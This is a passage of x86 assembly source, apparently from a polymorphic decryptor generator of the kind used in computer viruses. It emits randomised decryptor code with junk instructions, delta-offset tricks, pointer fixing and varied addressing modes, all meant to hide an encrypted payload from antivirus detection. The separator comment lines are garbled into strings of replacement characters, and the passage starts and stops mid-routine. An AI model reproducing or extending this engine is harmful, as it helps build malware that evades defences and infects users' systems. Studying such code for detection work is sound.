;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
gen_style_code: lodsd
|
||
add eax,ebp
|
||
push ecx
|
||
push esi
|
||
call eax
|
||
call gen_garbage
|
||
pop esi
|
||
pop ecx
|
||
loop gen_style_code
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Perform encryption
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
perform_crypt: ;Place for encryption code
|
||
|
||
db 10h dup (00h)
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Generate decryptor action: Get delta offset
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
gen_get_delta: ;This is the CALL opcode
|
||
|
||
mov al,0E8h
|
||
stosb
|
||
|
||
;Save the place for the calling address
|
||
|
||
stosd
|
||
mov dword ptr [ebp+delta_call],edi
|
||
push edi
|
||
|
||
;Generate some random data
|
||
|
||
call gen_rnd_block
|
||
|
||
;Get displacement from CALL instruction to destination
|
||
;address
|
||
|
||
mov eax,edi
|
||
pop esi
|
||
sub eax,esi
|
||
|
||
;Put destination address after CALL opcode
|
||
|
||
mov dword ptr [esi-00000004h],eax
|
||
|
||
;Generate some garbage code into destination address
|
||
|
||
call gen_garbage
|
||
|
||
;Choose method
|
||
|
||
mov eax,(end_delta_mode-tbl_delta_mode)/04h
|
||
call get_rnd_range
|
||
mov eax,dword ptr [ebp+tbl_delta_mode+eax*04h]
|
||
add eax,ebp
|
||
jmp eax
|
||
|
||
delta_method_1: ;Generate:
|
||
;
|
||
; call get_delta
|
||
; ...
|
||
; get_delta:
|
||
; ...
|
||
; pop index_reg
|
||
; ...
|
||
|
||
call gen_pop_index
|
||
ret
|
||
|
||
delta_method_2: ;Generate:
|
||
;
|
||
; call get_delta
|
||
; ...
|
||
; get_delta:
|
||
; ...
|
||
; pop reg_1
|
||
; ...
|
||
; mov reg_index,reg_1
|
||
; ...
|
||
|
||
call gen_pop_reg_1
|
||
mov ah,byte ptr [ebp+index_mask]
|
||
shl ah,03h
|
||
or ah,byte ptr [ebx+REG_MASK]
|
||
or ah,0C0h
|
||
mov al,8Bh
|
||
stosw
|
||
ret
|
||
|
||
delta_method_3: ;Generate:
|
||
;
|
||
; call get_delta
|
||
; ...
|
||
; get_delta:
|
||
; ...
|
||
; pop reg_1
|
||
; ...
|
||
; push reg_1
|
||
; ...
|
||
; pop reg_index
|
||
; ...
|
||
|
||
call gen_pop_reg_1
|
||
mov al,50h
|
||
or al,byte ptr [ebx+REG_MASK]
|
||
stosb
|
||
call gen_garbage
|
||
call gen_pop_index
|
||
ret
|
||
|
||
gen_pop_index: ;Generate pop reg_index + garbage
|
||
|
||
mov al,58h
|
||
or al,byte ptr [ebp+index_mask]
|
||
stosb
|
||
call gen_garbage
|
||
ret
|
||
|
||
gen_pop_reg_1: ;Generate pop reg_1 + garbage
|
||
|
||
call get_valid_reg
|
||
mov al,58h
|
||
or al,byte ptr [ebx+REG_MASK]
|
||
stosb
|
||
or byte ptr [ebx+REG_FLAGS],REG_READ_ONLY
|
||
push ebx
|
||
call gen_garbage
|
||
pop ebx
|
||
|
||
;Restore aux reg state
|
||
|
||
xor byte ptr [ebx+REG_FLAGS],REG_READ_ONLY
|
||
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Generate decryptor action: Fix pointer
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
gen_fix_ptr: ;Get displacement + offset of code to decrypt
|
||
|
||
lea eax,dword ptr [ebp+Mem_Base+mem_size]
|
||
add eax,dword ptr [ebp+ptr_disp]
|
||
sub eax,dword ptr [ebp+delta_call]
|
||
|
||
;Check direction
|
||
|
||
test byte ptr [ebp+build_flags],CRYPT_DIRECTION
|
||
jz fix_dir_ok
|
||
|
||
;Direction is from top to bottom
|
||
|
||
push eax
|
||
call fixed_size2ecx
|
||
xor eax,eax
|
||
mov al,byte ptr [ebp+oper_size]
|
||
push eax
|
||
mul ecx
|
||
pop ecx
|
||
sub eax,ecx
|
||
pop ecx
|
||
add eax,ecx
|
||
fix_dir_ok: push eax
|
||
|
||
;Fix using ADD or SUB
|
||
|
||
call get_rnd32
|
||
and al,01h
|
||
jz fix_with_sub
|
||
|
||
fix_with_add: ;Generate ADD reg_index,fix_value
|
||
|
||
mov ax,0C081h
|
||
or ah,byte ptr [ebp+index_mask]
|
||
stosw
|
||
pop eax
|
||
jmp short fix_done
|
||
|
||
fix_with_sub: ;Generate SUB reg_index,-fix_value
|
||
|
||
mov ax,0E881h
|
||
or ah,byte ptr [ebp+index_mask]
|
||
stosw
|
||
pop eax
|
||
neg eax
|
||
|
||
fix_done: stosd
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Generate decryptor action: Load counter
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
gen_load_ctr: ;Easy now, just move counter random initial value
|
||
;into counter reg and calc end_value
|
||
|
||
mov al,0B8h
|
||
or al,byte ptr [ebp+counter_mask]
|
||
stosb
|
||
call fixed_size2ecx
|
||
call get_rnd32
|
||
stosd
|
||
test byte ptr [ebp+build_flags],CRYPT_CDIR
|
||
jnz counter_down
|
||
counter_up: add eax,ecx
|
||
jmp short done_ctr_dir
|
||
counter_down: sub eax,ecx
|
||
done_ctr_dir: mov dword ptr [ebp+end_value],eax
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Generate decryptor action: Decrypt
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
gen_decrypt: ;Check if we are going to use a displacement
|
||
|
||
mov eax,dword ptr [ebp+ptr_disp]
|
||
or eax,eax
|
||
jnz more_complex
|
||
|
||
;Choose generator for [reg] indexing mode
|
||
|
||
mov edx,offset tbl_idx_reg
|
||
call choose_magic
|
||
jmp you_got_it
|
||
|
||
more_complex: ;More fun?!?!
|
||
|
||
mov al,byte ptr [ebp+build_flags]
|
||
test al,CRYPT_SIMPLEX
|
||
jnz crypt_xtended
|
||
|
||
;Choose generator for [reg+imm] indexing mode
|
||
|
||
mov edx,offset tbl_dis_reg
|
||
call choose_magic
|
||
|
||
you_got_it: ;Use magic to convert some values into
|
||
;desired instructions
|
||
|
||
call size_correct
|
||
mov dl,byte ptr [ebp+index_mask]
|
||
lodsb
|
||
or al,al
|
||
jnz adn_reg_01
|
||
cmp dl,00000101b
|
||
je adn_reg_02
|
||
adn_reg_01: lodsb
|
||
or al,dl
|
||
stosb
|
||
jmp common_part
|
||
adn_reg_02: lodsb
|
||
add al,45h
|
||
xor ah,ah
|
||
stosw
|
||
jmp common_part
|
||
|
||
crypt_xtended: ;Choose [reg+reg] or [reg+reg+disp]
|
||
|
||
test al,CRYPT_COMPLEX
|
||
jz ok_complex
|
||
|
||
;Get random displacement from current displacement
|
||
;eeehh?!?
|
||
|
||
mov eax,00000010h
|
||
call get_rnd_range
|
||
sub dword ptr [ebp+ptr_disp],eax
|
||
call load_aux
|
||
push ebx
|
||
call gen_garbage
|
||
|
||
;Choose generator for [reg+reg+imm] indexing mode
|
||
|
||
mov edx,offset tbl_paranoia
|
||
call choose_magic
|
||
jmp short done_xtended
|
||
|
||
ok_complex: mov eax,dword ptr [ebp+ptr_disp]
|
||
call load_aux
|
||
push ebx
|
||
call gen_garbage
|
||
|
||
;Choose generator for [reg+reg] indexing mode
|
||
|
||
mov edx,offset tbl_xtended
|
||
call choose_magic
|
||
|
||
done_xtended: ;Build decryptor instructions
|
||
|
||
call size_correct
|
||
pop ebx
|
||
mov dl,byte ptr [ebp+index_mask]
|
||
lodsb
|
||
mov cl,al
|
||
or al,al
|
||
jnz arn_reg_01
|
||
cmp dl,00000101b
|
||
jne arn_reg_01
|
||
lodsb
|
||
add al,40h
|
||
stosb
|
||
jmp short arn_reg_02
|
||
arn_reg_01: movsb
|
||
arn_reg_02: mov al,byte ptr [ebx+REG_MASK]
|
||
shl al,03h
|
||
or al,dl
|
||
stosb
|
||
or cl,cl
|
||
jnz arn_reg_03
|
||
cmp dl,00000101b
|
||
jne arn_reg_03
|
||
xor al,al
|
||
stosb
|
||
|
||
arn_reg_03: ;Restore aux reg state
|
||
|
||
xor byte ptr [ebx+REG_FLAGS],REG_READ_ONLY
|
||
|
||
common_part: ;Get post-build flags
|
||
|
||
lodsb
|
||
|
||
;Insert displacement from real address?
|
||
|
||
test al,MAGIC_PUTDISP
|
||
jz skip_disp
|
||
push eax
|
||
mov eax,dword ptr [ebp+ptr_disp]
|
||
neg eax
|
||
stosd
|
||
pop eax
|
||
|
||
skip_disp: ;Insert key?
|
||
|
||
test al,MAGIC_PUTKEY
|
||
jz skip_key
|
||
call copy_key
|
||
|
||
skip_key: ;Generate reverse code
|
||
|
||
call do_reverse
|
||
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Choose a magic generator
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
choose_magic: mov eax,00000006h
|
||
call get_rnd_range
|
||
add edx,ebp
|
||
lea esi,dword ptr [edx+eax*04h]
|
||
lodsd
|
||
add eax,ebp
|
||
mov esi,eax
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Do operand size correction
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
size_correct: lodsb
|
||
mov ah,byte ptr [ebp+oper_size]
|
||
cmp ah,01h
|
||
je store_correct
|
||
inc al
|
||
cmp ah,04h
|
||
je store_correct
|
||
mov ah,66h
|
||
xchg ah,al
|
||
stosw
|
||
ret
|
||
store_correct: stosb
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Load aux reg with displacement
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
load_aux: ;Get a valid auxiliary register
|
||
|
||
push eax
|
||
call get_valid_reg
|
||
or byte ptr [ebx+REG_FLAGS],REG_READ_ONLY
|
||
|
||
;Move displacement into aux reg
|
||
|
||
mov al,0B8h
|
||
or al,byte ptr [ebx+REG_MASK]
|
||
stosb
|
||
pop eax
|
||
neg eax
|
||
stosd
|
||
ret
|
||
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
;Generate crypt-code
|
||
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
|
||
do_reverse: xor eax,eax
|
||
mov al,byte ptr [ebp+oper_size]
|
||
shr eax,01h
|
||
shl eax,02h
|
||
add esi,eax
|
||
lodsd
|
||
add eax,ebp
|
||
mov esi,eax
|
||
push edi
|
||
lea edi,dword ptr [ebp+perform_crypt]
|
||
loop_string: lodsb
|
||
cmp al,MAGIC_ENDSTR
|
||
je end_of_magic
|
||
cmp al,MAGIC_ENDKEY
|
||
je last_spell
|
||
xor ecx,ecx
|
||
mov cl,al
|
||
rep movsb
|
||
jmp short loop_string
|
||
